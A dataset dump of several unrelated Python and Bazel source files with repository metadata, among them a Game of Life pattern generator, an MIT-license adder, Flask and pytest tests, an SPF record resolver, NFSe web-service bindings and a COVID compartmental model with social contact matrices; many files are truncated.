centerxs = [cols//5, 2*cols//5, 3*cols//5, 4*cols//5]
nteams = 4
team_assignments = list(range(nteams))
random.shuffle(team_assignments)
crab_patterns = [[], [], [], []]
for i, (centerx, centery) in enumerate(itertools.product(centerxs, centerys)):
imod4 = i%4
crabcenterx = centerx + random.randint(-jitter, jitter)
crabcentery = centery + random.randint(-jitter, jitter)
crab = get_grid_pattern(
"crabstretcher",
rows,
cols,
xoffset=crabcenterx,
yoffset=crabcentery,
hflip=(random.random() < 0.5),
vflip=(random.random() < 0.5),
rotdeg=random.choice(rotdegs),
)
team_ix = team_assignments[imod4]
team_pattern = crab_patterns[team_ix]
team_pattern.append(crab)
crab_patterns[team_ix] = team_pattern
pattern_unions = [pattern_union(pl) for pl in crab_patterns]
urls = [pattern2url(pu) for pu in pattern_unions]
return tuple(urls)
def quadgaussian_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
# Lower bound of 0.10, upper bound of 0.15
density = 0.10 + random.random() * 0.05
ncells = rows * cols
nlivecells = ((ncells * density)//4)*4
nlivecellspt = nlivecells // 4
# Variable blobbiness
stdx = cols// random.randint(8, 16)
stdy = rows// random.randint(8, 16)
jitter = 5
nteams = 4
team_assignments = list(range(nteams))
random.shuffle(team_assignments)
centerxs = [cols//4, 3*cols//4]
centerys = [rows//4, 3*rows//4]
urls = [None, None, None, None]
master_points = set()
for i, (centerx, centery) in enumerate(itertools.product(centerxs, centerys)):
team_ix = team_assignments[i]
cx = centerx + random.randint(-jitter, jitter)
cy = centery + random.randint(-jitter, jitter)
team_points = set()
while len(team_points) < nlivecellspt:
randx = int(random.gauss(cx, stdx))
randy = int(random.gauss(cy, stdy))
if (randx >= 0 and randx < cols) and (randy >= 0 and randy < rows):
if (randx, randy) not in master_points:
team_points.add((randx, randy))
master_points.add((randx, randy))
# Assemble the circle dot diagram for team
team_pattern = []
for y in range(rows):
this_row = []
for x in range(cols):
if (x, y) in team_points:
this_row.append("o")
else:
this_row.append(".")
this_rowstr = "".join(this_row)
team_pattern.append(this_rowstr)
team_url = pattern2url(team_pattern)
urls[team_ix] = team_url
return tuple(urls)
#@retry_on_failure
| 27.946895 | 113 | 0.540562 |
a1e396a0fe0bfe84f4e348a5cd7eab9d9e2a1638 | 2,962 | py | Python | filemanipulator.py | paulkramme/mit-license-adder | 1865413c1932a3108883dc2b77c67608d56be275 | [
"MIT"
] | null | null | null | filemanipulator.py | paulkramme/mit-license-adder | 1865413c1932a3108883dc2b77c67608d56be275 | [
"MIT"
] | null | null | null | filemanipulator.py | paulkramme/mit-license-adder | 1865413c1932a3108883dc2b77c67608d56be275 | [
"MIT"
] | null | null | null | #!/usr/bin/python2
import tempfile
import sys
import datetime
mit_license = ("""\
/*
MIT License
Copyright (c) 2016 Paul Kramme
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
*/
""")
filename = sys.argv[1]
#license = sys.argv[1]
print "Licenseadder by Paul Kramme"
with FileModifier(filename) as fp:
fp.writeline(mit_license, 0)
| 32.911111 | 89 | 0.668467 |
a1e520db04d481d770fcb8c7ed4dbac6d857ce44 | 4,048 | py | Python | ve/unit/test_list_scalar.py | aneels3/pyvsc | 692fa2baa9cc0251411b3a8ace2854b7e65c288a | [
"Apache-2.0"
] | null | null | null | ve/unit/test_list_scalar.py | aneels3/pyvsc | 692fa2baa9cc0251411b3a8ace2854b7e65c288a | [
"Apache-2.0"
] | null | null | null | ve/unit/test_list_scalar.py | aneels3/pyvsc | 692fa2baa9cc0251411b3a8ace2854b7e65c288a | [
"Apache-2.0"
] | null | null | null | '''
Created on Jun 21, 2020
@author: ballance
'''
import vsc
from vsc_test_case import VscTestCase
from vsc.visitors.model_pretty_printer import ModelPrettyPrinter
| 27.726027 | 68 | 0.447381 |
a1e5a8c1e742d2b35abb789d741addea637b7ba0 | 5,344 | py | Python | config-server/test.py | wtsi-hgi/webhook-router | a36987055ec4c1bcb443d391807c6469e3d21ba8 | [
"MIT"
] | 2 | 2017-11-21T11:16:44.000Z | 2022-01-05T23:17:50.000Z | config-server/test.py | wtsi-hgi/webhook-router | a36987055ec4c1bcb443d391807c6469e3d21ba8 | [
"MIT"
] | 14 | 2017-10-17T16:05:39.000Z | 2022-02-12T02:42:49.000Z | config-server/test.py | wtsi-hgi/webhook-router | a36987055ec4c1bcb443d391807c6469e3d21ba8 | [
"MIT"
] | null | null | null | import json
from configserver import ConfigServer, get_postgres_db
from configserver.errors import InvalidRouteUUIDError
from flask.testing import FlaskClient
import pytest
from peewee import SqliteDatabase
import logging
from uuid import uuid4
import functools
from typing import Iterable
def test_create_route(router_app: FlaskClient):
create_route_resp = router_app.post(
"/create-route",
data=json.dumps({
"name": "route",
"destination": "http://127.0.0.1"
}),
content_type='application/json'
)
assert create_route_resp.status_code == 201
def test_get(router_app: FlaskClient, test_route_uuid: str):
assert router_app.get(f"/routes/{test_route_uuid}").status_code == 200
def test_get_by_token(router_app: FlaskClient, test_route_uuid: str):
token = json.loads(router_app.get(f"/routes/{test_route_uuid}").data)["token"]
assert router_app.get(f"/routes/token/{token}").status_code == 200
def test_patch(router_app: FlaskClient, test_route_uuid: str):
assert router_app.patch(
f"/routes/{test_route_uuid}",
data=json.dumps({
"name": "new-name"
}),
content_type='application/json',
).status_code == 204
assert json.loads(router_app.get(f"/routes/{test_route_uuid}").data)["name"] == "new-name"
| 31.621302 | 94 | 0.691804 |
a1e5ccbd0c595e22be2f8bf21bf5897f8d70355d | 1,318 | py | Python | Scripts/spliter.py | sawa25/PDFs-TextExtract | bdc4469deab8b023135165ce8dbc63577927a508 | [
"MIT"
] | 87 | 2020-05-08T00:04:17.000Z | 2022-03-27T11:39:04.000Z | Scripts/spliter.py | tzo13123/PDFs-TextExtract | 3d00b7b4007557e1467fb5aca8bf8e37513de124 | [
"MIT"
] | 5 | 2020-06-24T13:22:37.000Z | 2021-04-10T21:39:32.000Z | Scripts/spliter.py | tzo13123/PDFs-TextExtract | 3d00b7b4007557e1467fb5aca8bf8e37513de124 | [
"MIT"
] | 49 | 2020-05-08T00:08:01.000Z | 2022-02-04T21:04:03.000Z | import os
from PyPDF2 import PdfFileReader, PdfFileWriter
#Solution based in two functions:
#1.pdf remove : Remove existed pdf documents(result for your last split operation)
#2.pdf splitter : Split your main pdf document into group of documents.
if __name__ == '__main__':
path = '../PDFs-TextExtract/pdf_merged.pdf' #specifiy your main pdf document path.
fname = os.listdir('../PDFs-TextExtract/split/') #fname: List contain pdf documents names in folder
length = len(fname) #Retrieve List fname Length.
#call pdf remove function
pdf_remove(length)
#call pdf splitter function
pdf_splitter(path)
| 32.95 | 107 | 0.69044 |
a1e6051e4e110799735dcb4615879dd95634d238 | 107 | py | Python | swagger_client/apis/__init__.py | sendx/sendx-api-python | edce9755d3718efb12cb5493da7cbac961cb1d9b | [
"Apache-2.0"
] | null | null | null | swagger_client/apis/__init__.py | sendx/sendx-api-python | edce9755d3718efb12cb5493da7cbac961cb1d9b | [
"Apache-2.0"
] | null | null | null | swagger_client/apis/__init__.py | sendx/sendx-api-python | edce9755d3718efb12cb5493da7cbac961cb1d9b | [
"Apache-2.0"
] | null | null | null | from __future__ import absolute_import
# import apis into api package
from .contact_api import ContactApi
| 21.4 | 38 | 0.841121 |
a1e9308fe3ee5db7d2721276c33a44e2c57e6e80 | 3,915 | py | Python | strategy/overreact_strategy.py | tseng1026/SideProject-Investment | e7135e667cdee16d1d754ca0f9ebd88226083e66 | [
"MIT"
] | null | null | null | strategy/overreact_strategy.py | tseng1026/SideProject-Investment | e7135e667cdee16d1d754ca0f9ebd88226083e66 | [
"MIT"
] | null | null | null | strategy/overreact_strategy.py | tseng1026/SideProject-Investment | e7135e667cdee16d1d754ca0f9ebd88226083e66 | [
"MIT"
] | null | null | null | from typing import Callable
import numpy as np
from constants.constants import IndicatorType
from strategy.base import BaseStrategy
| 35.590909 | 78 | 0.585951 |
a1ed273b2e4ad00a56a2ecb5eabb664805ce9cd8 | 12,746 | py | Python | src/erpbrasil/edoc/provedores/issnet.py | Engenere/erpbrasil.edoc | 2e835cc191407a8261c6f27933b7660d74b5a691 | [
"MIT"
] | 8 | 2019-09-27T05:59:06.000Z | 2022-01-16T21:04:04.000Z | src/erpbrasil/edoc/provedores/issnet.py | Engenere/erpbrasil.edoc | 2e835cc191407a8261c6f27933b7660d74b5a691 | [
"MIT"
] | 18 | 2020-10-05T19:23:59.000Z | 2022-02-22T11:39:22.000Z | src/erpbrasil/edoc/provedores/issnet.py | Engenere/erpbrasil.edoc | 2e835cc191407a8261c6f27933b7660d74b5a691 | [
"MIT"
] | 10 | 2019-11-28T14:03:02.000Z | 2022-02-25T14:06:14.000Z | # coding=utf-8
# Copyright (C) 2020 - TODAY, Marcel Savegnago - Escodoo
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import xml.etree.ElementTree as ET
from datetime import datetime
from erpbrasil.base import misc
from erpbrasil.edoc.nfse import NFSe
from erpbrasil.edoc.nfse import ServicoNFSe
try:
from nfselib.issnet.v1_00 import servico_cancelar_nfse_envio
from nfselib.issnet.v1_00 import servico_consultar_lote_rps_envio
from nfselib.issnet.v1_00 import servico_consultar_lote_rps_resposta
from nfselib.issnet.v1_00 import servico_consultar_nfse_rps_envio
from nfselib.issnet.v1_00 import servico_consultar_situacao_lote_rps_envio
from nfselib.issnet.v1_00 import servico_consultar_situacao_lote_rps_resposta
from nfselib.issnet.v1_00 import servico_enviar_lote_rps_resposta
issnet = True
except ImportError:
issnet = False
cidade = {
3543402: 'ribeiraopreto', # Ribeiro Preto - SP
3301702: 'duquedecaxias', # Duque de Caxias - RJ
}
endpoint = 'servicos.asmx?WSDL'
if issnet:
servicos = {
'envia_documento': ServicoNFSe(
'RecepcionarLoteRps',
endpoint, servico_enviar_lote_rps_resposta, True),
'consulta_recibo': ServicoNFSe(
'ConsultarSituacaoLoteRPS',
endpoint, servico_consultar_situacao_lote_rps_resposta, True),
'consultar_lote_rps': ServicoNFSe(
'ConsultarLoteRps',
endpoint, servico_consultar_lote_rps_resposta, True),
'cancela_documento': ServicoNFSe(
'CancelarNfse',
endpoint, servico_cancelar_nfse_envio, True),
'consulta_nfse_rps': ServicoNFSe(
'ConsultarNFSePorRPS',
endpoint, servico_consultar_nfse_rps_envio, True),
}
else:
servicos = ()
| 40.722045 | 122 | 0.581751 |
a1ed89cc5c2446b1fe11b61f094fef9e3b0b2652 | 1,647 | py | Python | python/filter_MA.py | vsellemi/macroeconomic-forecasting | a5ad1b88daae084f258c0f5e5b9bd9d145934375 | [
"MIT"
] | 3 | 2021-11-29T11:18:40.000Z | 2021-12-21T15:05:06.000Z | python/filter_MA.py | vsellemi/macroeconomic-forecasting | a5ad1b88daae084f258c0f5e5b9bd9d145934375 | [
"MIT"
] | null | null | null | python/filter_MA.py | vsellemi/macroeconomic-forecasting | a5ad1b88daae084f258c0f5e5b9bd9d145934375 | [
"MIT"
] | 4 | 2021-11-29T11:18:48.000Z | 2021-12-22T01:36:59.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 7 14:40:40 2021
@author: victorsellemi
"""
import numpy as np
def filter_MA(Y,q = 2):
"""
DESCRIPTION:
Decompose a time series into a trend and stationary component
using the moving average (MA) filter (i.e., low pass filter)
INPUT:
Y = (T x 1) vector of time series data
q = scalar value of moving average (half) window: default = 2
OUTPUT:
trend = (T x 1) vector of trend component of the time series, i.e., low frequency component
error = (T x 1) vector of stationary part of the time series
"""
# length of time series
T = Y.shape[0]
# window width
Q = 2*q
# border of the series is preserved
p1 = np.concatenate((np.eye(q), np.zeros((q,T-q))), axis = 1)
p2 = np.zeros((T-Q,T))
p3 = np.concatenate((np.zeros((q,T-q)), np.eye(q)), axis = 1)
P = np.concatenate((p1,p2,p3), axis = 0)
# part of the series to be averaged
X = np.eye(T-Q)
Z = np.zeros((T-Q,1))
for i in range(Q):
# update X
X = np.concatenate((X, np.zeros((T-Q,1))), axis = 1) + np.concatenate((Z, np.eye(T-Q)), axis = 1)
# update Z
Z = np.concatenate((Z, np.zeros((T-Q,1))), axis = 1)
X = np.concatenate((np.zeros((q,T)), X, np.zeros((q,T))), axis = 0)
# construct linear filter
L = P + (1/(Q+1)) * X
# construct the trend
trend = L.dot(Y)
# construct stationary component
signal = Y - trend
return trend,signal
| 24.58209 | 105 | 0.538555 |
a1ed8f64fdb7a590a23d44e6a7e10803d5c52975 | 3,480 | py | Python | LightFields/xmlFiles/generateXMLFiles.py | sudarshannagesh90/OptimizationDeepLearningImageProcessing | 36ab96ce29a2403166f8f176eb84062c2db7cc6e | [
"MIT"
] | null | null | null | LightFields/xmlFiles/generateXMLFiles.py | sudarshannagesh90/OptimizationDeepLearningImageProcessing | 36ab96ce29a2403166f8f176eb84062c2db7cc6e | [
"MIT"
] | null | null | null | LightFields/xmlFiles/generateXMLFiles.py | sudarshannagesh90/OptimizationDeepLearningImageProcessing | 36ab96ce29a2403166f8f176eb84062c2db7cc6e | [
"MIT"
] | null | null | null | import xml.etree.ElementTree as etree
import xml.dom.minidom
import subprocess
import os
import imageio
import h5py
import numpy as np
filenames = ["airboat","al","alfa147","cessna","cube","diamond","dodecahedron","gourd","humanoid_quad","humanoid_tri","icosahedron","lamp","magnolia","minicooper","octahedron","power_lines","roi","sandal","shuttle","skyscraper","slot_machine","teapot","tetrahedron","violin_case"]
scaleVal = [0.5,0.5,0.01,0.08,0.5,0.01,0.5,0.5,0.1,0.1,0.5,0.2,0.025,0.01,0.5,0.07,0.02,0.2,0.1,0.03,0.1,0.01,0.5,0.5]
index = 0
cameraPosOrigin = [5,1,-3]
deltaCam = 0.1
hr_image = []
lr_image = []
destination_path = "/home/sudarshan/git/OptimizationDeepLearningImageProcessing/LightFields/h5Files/"
dataset_name = "generatedLightFields"
for filename in filenames:
HRindex = 0
with imageio.get_writer(filename+"/"+filename+".gif", mode='I') as writer:
for indx in range(-2,3):
for indy in range(-2,3):
cwd = os.getcwd()
directory = cwd+"/"+filename+"/"
if not os.path.exists(directory):
os.makedirs(directory)
cameraPos = [5, cameraPosOrigin[1]+indx*deltaCam,cameraPosOrigin[2]+indy*deltaCam]
XMLstring = createXMLstring(filename,str(scaleVal[index]),str(cameraPos[1]),str(cameraPos[2]))
with open(directory+filename+str(indx)+str(indy)+".xml", "w") as cube_xml:
cube_xml.write(XMLstring)
cmd = ["mitsuba", filename+"/"+filename+str(indx)+str(indy)+".xml"]
cmd_out = subprocess.check_output(cmd)
image = imageio.imread(filename+"/"+filename+str(indx)+str(indy)+".png")
hr_image.append(np.asarray(image))
HRindex = HRindex+1
if indx == 0 and indy == 0:
lr_image.append(np.asarray(image))
writer.append_data(image)
print(["Completed index: "+str(index)])
index = index+1
create_h5(data = lr_image, label = hr_image, path = destination_path, file_name = dataset_name+"training.h5")
print("data of length ", len(lr_image), "and label of length ", len(hr_image)) | 47.027027 | 280 | 0.72069 |
a1ee7d9e488784cc542ed9f4aaf3c9cd7f803d7f | 3,001 | py | Python | _old/test.py | DanielRabl/libtw2 | ebcc833aa418e0ee25ff1da2881f7102dc7efa5d | [
"Apache-2.0",
"MIT"
] | 30 | 2017-07-21T19:05:07.000Z | 2022-01-14T16:24:53.000Z | _old/test.py | DanielRabl/libtw2 | ebcc833aa418e0ee25ff1da2881f7102dc7efa5d | [
"Apache-2.0",
"MIT"
] | 50 | 2017-11-20T16:43:05.000Z | 2022-03-02T21:37:45.000Z | _old/test.py | DanielRabl/libtw2 | ebcc833aa418e0ee25ff1da2881f7102dc7efa5d | [
"Apache-2.0",
"MIT"
] | 12 | 2017-07-21T19:05:10.000Z | 2021-04-09T20:22:58.000Z | import datafile
from collections import defaultdict
#struct CMapItemImage_v1
#{
# int m_Version;
# int m_Width;
# int m_Height;
# int m_External;
# int m_ImageName;
# int m_ImageData;
#} ;
#struct CMapItemImage : public CMapItemImage_v1
#{
# enum { CURRENT_VERSION=2 };
# int m_Format;
#};
if __name__ == '__main__':
import sys
sys.exit(main())
| 25.008333 | 104 | 0.673775 |
a1ee7de4317afbc181dee20858eea2b69d2fac4c | 5,414 | py | Python | tests/test_rotate_3dmarkers.py | CRBS/etspecutil | d0b42730545cbf04e0cb222a40845e19ff9ee3f0 | [
"OLDAP-2.6",
"Python-2.0"
] | null | null | null | tests/test_rotate_3dmarkers.py | CRBS/etspecutil | d0b42730545cbf04e0cb222a40845e19ff9ee3f0 | [
"OLDAP-2.6",
"Python-2.0"
] | null | null | null | tests/test_rotate_3dmarkers.py | CRBS/etspecutil | d0b42730545cbf04e0cb222a40845e19ff9ee3f0 | [
"OLDAP-2.6",
"Python-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_rotate_3dmarkers
----------------------------------
Tests for `rotate_3dmarkers` module.
"""
import sys
import unittest
import os.path
import tempfile
import shutil
import logging
from etspecutil.marker import MarkersList
from etspecutil.marker import MarkersFrom3DMarkersFileFactory
from etspecutil import rotate_3dmarkers
from etspecutil.rotate_3dmarkers import Parameters
if __name__ == '__main__':
sys.exit(unittest.main())
| 35.155844 | 76 | 0.579424 |
a1efd6d129721046eb1d2381c5f7945eeeb81f90 | 431 | py | Python | tests/conftest.py | asvetlov/aiohttp_mako | 8fb66bd35b8cb4a2fa91e33f3dff918e4798a15a | [
"Apache-2.0"
] | 24 | 2016-12-25T16:24:45.000Z | 2020-04-07T14:39:28.000Z | tests/conftest.py | jettify/aiohttp_mako | 8fb66bd35b8cb4a2fa91e33f3dff918e4798a15a | [
"Apache-2.0"
] | 168 | 2016-11-12T20:50:34.000Z | 2022-03-18T02:09:08.000Z | tests/conftest.py | jettify/aiohttp_mako | 8fb66bd35b8cb4a2fa91e33f3dff918e4798a15a | [
"Apache-2.0"
] | 9 | 2016-12-13T10:48:26.000Z | 2020-09-17T10:42:40.000Z | import sys
import pytest
import aiohttp_mako
from aiohttp import web
| 22.684211 | 64 | 0.584687 |
a1f3d906821dbcf88254a5e1e8e69f73b13693e7 | 3,583 | py | Python | CraftMasterGame/src/enemy.py | Athelios/CraftMaster | 636cc60681d3199b3ae685690ee427fe81672541 | [
"MIT"
] | null | null | null | CraftMasterGame/src/enemy.py | Athelios/CraftMaster | 636cc60681d3199b3ae685690ee427fe81672541 | [
"MIT"
] | null | null | null | CraftMasterGame/src/enemy.py | Athelios/CraftMaster | 636cc60681d3199b3ae685690ee427fe81672541 | [
"MIT"
] | null | null | null | from npc import *
import math
from pyglet import image
from pyglet.graphics import TextureGroup
import os
import json
| 42.654762 | 155 | 0.568518 |
a1f67693d5e8c244c0eda84f1334ad34e26d18f3 | 754 | py | Python | goldsrc/mdl/structs/bodypart.py | half5life/SourceIO | f3dc6db92daa537acbb487ce09f371866f6e3e7f | [
"MIT"
] | 1 | 2021-07-12T12:55:27.000Z | 2021-07-12T12:55:27.000Z | goldsrc/mdl/structs/bodypart.py | half5life/SourceIO | f3dc6db92daa537acbb487ce09f371866f6e3e7f | [
"MIT"
] | null | null | null | goldsrc/mdl/structs/bodypart.py | half5life/SourceIO | f3dc6db92daa537acbb487ce09f371866f6e3e7f | [
"MIT"
] | null | null | null | from typing import List
from .model import StudioModel
from ....source_shared.base import Base
from ....utilities.byte_io_mdl import ByteIO
| 30.16 | 80 | 0.619363 |
a1f747225cd20292d907c35e437ba676e03d1874 | 511 | py | Python | app/core/auth.py | oxfn/owtest | f4eeae225ef67684d96edd5708c44a0fd639d037 | [
"Unlicense"
] | null | null | null | app/core/auth.py | oxfn/owtest | f4eeae225ef67684d96edd5708c44a0fd639d037 | [
"Unlicense"
] | null | null | null | app/core/auth.py | oxfn/owtest | f4eeae225ef67684d96edd5708c44a0fd639d037 | [
"Unlicense"
] | null | null | null | from fastapi import Depends
from fastapi.exceptions import HTTPException
from fastapi.security import OAuth2PasswordBearer
from app.models.users import User, UserRepository
get_token = OAuth2PasswordBearer(tokenUrl="/login")
| 28.388889 | 70 | 0.749511 |
a1f94bf8941a2359311bcdccf3b7596591d7d459 | 1,449 | py | Python | hard-gists/4471462/snippet.py | jjhenkel/dockerizeme | eaa4fe5366f6b9adf74399eab01c712cacaeb279 | [
"Apache-2.0"
] | 21 | 2019-07-08T08:26:45.000Z | 2022-01-24T23:53:25.000Z | hard-gists/4471462/snippet.py | jjhenkel/dockerizeme | eaa4fe5366f6b9adf74399eab01c712cacaeb279 | [
"Apache-2.0"
] | 5 | 2019-06-15T14:47:47.000Z | 2022-02-26T05:02:56.000Z | hard-gists/4471462/snippet.py | jjhenkel/dockerizeme | eaa4fe5366f6b9adf74399eab01c712cacaeb279 | [
"Apache-2.0"
] | 17 | 2019-05-16T03:50:34.000Z | 2021-01-14T14:35:12.000Z | #!/usr/bin/env python
#
# Author: Fred C.
# Email:
#
from __future__ import print_function
from collections import defaultdict
import sys
import DNS
import re
RE_PARSE = re.compile(r'(ip4|ip6|include|redirect)[:=](.*)', re.IGNORECASE)
MAX_RECURSION = 5
if __name__ == '__main__':
whitelist = set()
with open(sys.argv[1]) as fd:
for line in fd:
line = line.strip()
for ip in process(line):
whitelist.add(ip)
for ip in sorted(whitelist):
print(ip)
| 21.308824 | 75 | 0.63285 |
a1f99eeded3cabb05a888e2acb13ce873a05d09f | 895 | bzl | Python | tools/build_rules/cc_resources.bzl | justbuchanan/kythe | 91da8b42354cd3b6818be5a9bf4389fd144ff6e5 | [
"Apache-2.0"
] | null | null | null | tools/build_rules/cc_resources.bzl | justbuchanan/kythe | 91da8b42354cd3b6818be5a9bf4389fd144ff6e5 | [
"Apache-2.0"
] | null | null | null | tools/build_rules/cc_resources.bzl | justbuchanan/kythe | 91da8b42354cd3b6818be5a9bf4389fd144ff6e5 | [
"Apache-2.0"
] | null | null | null |
# Returns the generated files directory root.
#
# Note: workaround for https://github.com/bazelbuild/bazel/issues/4463.
| 34.423077 | 79 | 0.484916 |
a1fa4d83464708be7267466fae9107d6a82954d1 | 32,249 | py | Python | modelling/model_seiihurd_matrices.py | lhunlindeion/Mathematical-and-Statistical-Modeling-of-COVID19-in-Brazil | 164f19fcf04fe391aa7515fe436c63c6534fa89c | [
"MIT"
] | 37 | 2020-03-28T16:36:56.000Z | 2021-11-16T11:34:55.000Z | modelling/model_seiihurd_matrices.py | lhunlindeion/Mathematical-and-Statistical-Modeling-of-COVID19-in-Brazil | 164f19fcf04fe391aa7515fe436c63c6534fa89c | [
"MIT"
] | 1 | 2020-05-29T16:39:03.000Z | 2020-06-01T19:29:55.000Z | modelling/model_seiihurd_matrices.py | lhunlindeion/Mathematical-and-Statistical-Modeling-of-COVID19-in-Brazil | 164f19fcf04fe391aa7515fe436c63c6534fa89c | [
"MIT"
] | 9 | 2020-03-28T00:00:16.000Z | 2021-02-19T14:41:47.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue May 19 18:08:01 2020
@author: Felipe A. C. Pereira
Implementao do ajuste do modelo SEIIHURD com separao de grupos. Necessita
de mais verificaes e funes para simplificar o input. Baseado nas classes
disponveis no modelos.py
"""
import numpy as np
from functools import reduce
import scipy.integrate as spi
from scipy.optimize import least_squares
from platypus import NSGAII, Problem, Real
from pyswarms.single.global_best import GlobalBestPSO
import pyswarms as ps
from pyswarms.backend.topology import Star
from pyswarms.utils.plotters import plot_cost_history
from itertools import repeat
import multiprocessing as mp
import copy
import joblib
'''
Social contact matrices from
PREM, Kiesha; COOK, Alex R.; JIT, Mark. Projecting social contact matrices in
152 countries using contact surveys and demographic data. PLoS computational
biology, v. 13, n. 9, p. e1005697, 2017.
'''
ages_Mu_min = 5 * np.arange(16)
Mu_house = np.array([[0.47868515, 0.50507561, 0.29848922, 0.15763748, 0.26276959,
0.40185462, 0.46855027, 0.42581354, 0.2150961 , 0.0856771 ,
0.08705463, 0.07551931, 0.05129175, 0.02344832, 0.00793644,
0.01072846],
[0.35580205, 0.77874482, 0.51392686, 0.21151069, 0.08597966,
0.28306027, 0.49982218, 0.52854893, 0.41220947, 0.15848728,
0.07491245, 0.07658339, 0.04772343, 0.02588962, 0.01125956,
0.01073152],
[0.25903114, 0.63488713, 1.36175618, 0.50016515, 0.11748191,
0.10264613, 0.24113458, 0.47274372, 0.54026417, 0.26708819,
0.11007723, 0.04406045, 0.02746409, 0.02825033, 0.02044872,
0.01214665],
[0.14223192, 0.24383932, 0.53761638, 1.05325205, 0.28778496,
0.10925453, 0.0651564 , 0.2432454 , 0.39011334, 0.41381277,
0.23194909, 0.07541471, 0.03428398, 0.02122257, 0.01033573,
0.00864859],
[0.27381886, 0.15430529, 0.16053062, 0.5104134 , 0.95175366,
0.3586594 , 0.09248672, 0.04774269, 0.15814197, 0.36581739,
0.25544811, 0.13338965, 0.03461345, 0.01062458, 0.00844199,
0.00868782],
[0.59409802, 0.26971847, 0.10669146, 0.18330524, 0.39561893,
0.81955947, 0.26376865, 0.06604084, 0.03824556, 0.11560004,
0.23218163, 0.15331788, 0.07336147, 0.02312255, 0.00412646,
0.01025778],
[0.63860889, 0.75760606, 0.43109156, 0.09913293, 0.13935789,
0.32056062, 0.65710277, 0.25488454, 0.1062129 , 0.0430932 ,
0.06880784, 0.09938458, 0.09010691, 0.02233902, 0.01155556,
0.00695246],
[0.56209348, 0.87334544, 0.75598244, 0.33199136, 0.07233271,
0.08674171, 0.20243583, 0.60062714, 0.17793601, 0.06307045,
0.04445926, 0.04082447, 0.06275133, 0.04051762, 0.01712777,
0.00598721],
[0.35751289, 0.66234582, 0.77180208, 0.54993616, 0.17368099,
0.07361914, 0.13016852, 0.19937327, 0.46551558, 0.15412263,
0.06123041, 0.0182514 , 0.04234381, 0.04312892, 0.01656267,
0.01175358],
[0.208131 , 0.41591452, 0.56510014, 0.67760241, 0.38146504,
0.14185001, 0.06160354, 0.12945701, 0.16470166, 0.41150841,
0.14596804, 0.04404807, 0.02395316, 0.01731295, 0.01469059,
0.02275339],
[0.30472548, 0.26744442, 0.41631962, 0.46516888, 0.41751365,
0.28520772, 0.13931619, 0.07682945, 0.11404965, 0.16122096,
0.33813266, 0.1349378 , 0.03755396, 0.01429426, 0.01356763,
0.02551792],
[0.52762004, 0.52787011, 0.33622117, 0.43037934, 0.36416323,
0.42655672, 0.33780201, 0.13492044, 0.0798784 , 0.15795568,
0.20367727, 0.33176385, 0.12256126, 0.05573807, 0.0124446 ,
0.02190564],
[0.53741472, 0.50750067, 0.3229994 , 0.30706704, 0.21340314,
0.27424513, 0.32838657, 0.26023515, 0.13222548, 0.07284901,
0.11950584, 0.16376401, 0.25560123, 0.09269703, 0.02451284,
0.00631762],
[0.37949376, 0.55324102, 0.47449156, 0.24796638, 0.19276924,
0.20675484, 0.3267867 , 0.39525729, 0.3070043 , 0.10088992,
0.10256839, 0.13016641, 0.1231421 , 0.24067708, 0.05475668,
0.01401368],
[0.16359554, 0.48536065, 0.40533723, 0.31542539, 0.06890518,
0.15670328, 0.12884062, 0.27912381, 0.25685832, 0.20143856,
0.12497647, 0.07565566, 0.10331686, 0.08830789, 0.15657321,
0.05744065],
[0.29555039, 0.39898035, 0.60257982, 0.5009724 , 0.13799378,
0.11716593, 0.14366306, 0.31602298, 0.34691652, 0.30960511,
0.31253708, 0.14557295, 0.06065554, 0.10654772, 0.06390924,
0.09827735]])
Mu_school = np.array([[3.21885854e-001, 4.31659966e-002, 7.88269419e-003,
8.09548363e-003, 5.35038146e-003, 2.18201974e-002,
4.01633514e-002, 2.99376002e-002, 1.40680283e-002,
1.66587853e-002, 9.47774696e-003, 7.41041622e-003,
1.28200661e-003, 7.79120405e-004, 8.23608272e-066,
6.37926405e-120],
[5.40133328e-002, 4.84870697e+000, 2.70046494e-001,
3.14778450e-002, 3.11206331e-002, 8.56826951e-002,
1.08251879e-001, 9.46101139e-002, 8.63528188e-002,
5.51141159e-002, 4.19385198e-002, 1.20958942e-002,
4.77242219e-003, 1.39787217e-003, 3.47452943e-004,
8.08973738e-039],
[4.56461982e-004, 1.04840235e+000, 6.09152459e+000,
1.98915822e-001, 1.99709921e-002, 6.68319525e-002,
6.58949586e-002, 9.70851505e-002, 9.54147078e-002,
6.70538232e-002, 4.24864096e-002, 1.98701346e-002,
5.11869429e-003, 7.27320438e-004, 4.93746124e-025,
1.82153965e-004],
[2.59613205e-003, 4.73315233e-002, 1.99337834e+000,
7.20040500e+000, 8.57326037e-002, 7.90668822e-002,
8.54208542e-002, 1.10816964e-001, 8.76955236e-002,
9.22975521e-002, 4.58035025e-002, 2.51130956e-002,
5.71391798e-003, 1.07818752e-003, 6.21174558e-033,
1.70710246e-070],
[7.19158720e-003, 2.48833195e-002, 9.89727235e-003,
8.76815025e-001, 4.33963352e-001, 5.05185217e-002,
3.30594492e-002, 3.81384107e-002, 2.34709676e-002,
2.67235372e-002, 1.32913985e-002, 9.00655556e-003,
6.94913059e-004, 1.25675951e-003, 1.77164197e-004,
1.21957619e-047],
